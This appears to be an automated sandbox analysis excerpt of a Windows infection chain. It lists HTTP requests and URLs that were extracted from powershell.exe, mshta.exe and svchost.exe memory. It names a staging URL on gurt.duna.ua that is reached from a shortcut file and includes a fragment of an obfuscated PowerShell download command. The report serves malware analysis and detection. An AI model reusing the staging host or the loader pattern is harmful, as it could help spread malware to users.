Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: gurt.duna.ua
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 27 Oct 2024 06:35:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closelink: <https://gurt.duna.ua/wp-json/>; rel="https://api.w.org/"x-turbo-charged-by: LiteSpeedx-ray: wnp447:0.300/wn447:0.260/wo447X-Page-Speed: onCache-Control: max-age=0, no-cache
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, select_radio_check[1].css.3.drString found in binary or memory: http://codepen.io/elmahdim/pen/hlmri
Source: svchost.exe, 00000005.00000002.2953737003.000001FF7500F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74ECD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chosen.min[1].css.3.drString found in binary or memory: http://getharvest.com
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11I
Source: powershell.exe, 00000002.00000002.1731496106.00000226019EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.0000022610080000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1731496106.0000022600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1731496106.0000022600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/intersection-observer-polyfill
Source: powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74F42000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: mshta.exe, 00000003.00000003.1823734718.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, chosen.min[1].css.3.drString found in binary or memory: https://github.com/harvesthq/chosen
Source: mshta.exe, 00000003.00000003.1823734718.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, chosen.min[1].css.3.drString found in binary or memory: https://github.com/harvesthq/chosen/blob/master/LICENSE.md
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/#website
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/?s=
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/cart/
Source: mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/comments/feed/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/dohovir-oferty/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/feed/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/feed/5
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/help/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/edit-account/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/lost-password/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/orders/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-discounts/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/order-table/
Source: powershell.exe, 00000002.00000002.1731496106.0000022601701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEA
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2-6
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2...
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2...L
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2...x
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage20
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage205
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage22
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage22&5
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2246
Source: powershell.exe, 00000002.00000002.1747753246.000002266AE40000.00000004.00000020.00020000.00000000.sdmp, T15hf0Y3mp.lnkString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg
Source: powershell.exe, 00000002.00000002.1749215327.000002266B080000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1750564132.000002266C910000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1747999307.000002266AECC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1747753246.000002266AE47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg=Get-Location;$eCRg=Join-Path
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2?
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2?6
Source: mshta.exe, 00000003.00000003.1933398840.00000184077A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Ar
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2C:
Source: mshta.exe, 00000003.00000002.2951847916.0000017C054D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2H
Source: mshta.exe, 00000003.00000003.1823944466.000001840776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2L
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2N
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2N6
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2P
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Q6
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2a
Source: mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2b6o
Source: mshta.exe, 00000003.00000002.2953889531.0000018407925000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2https://gurt.duna.ua/programy-naucz
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2i
Source: mshta.exe, 00000003.00000003.1823944466.000001840776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2j1x
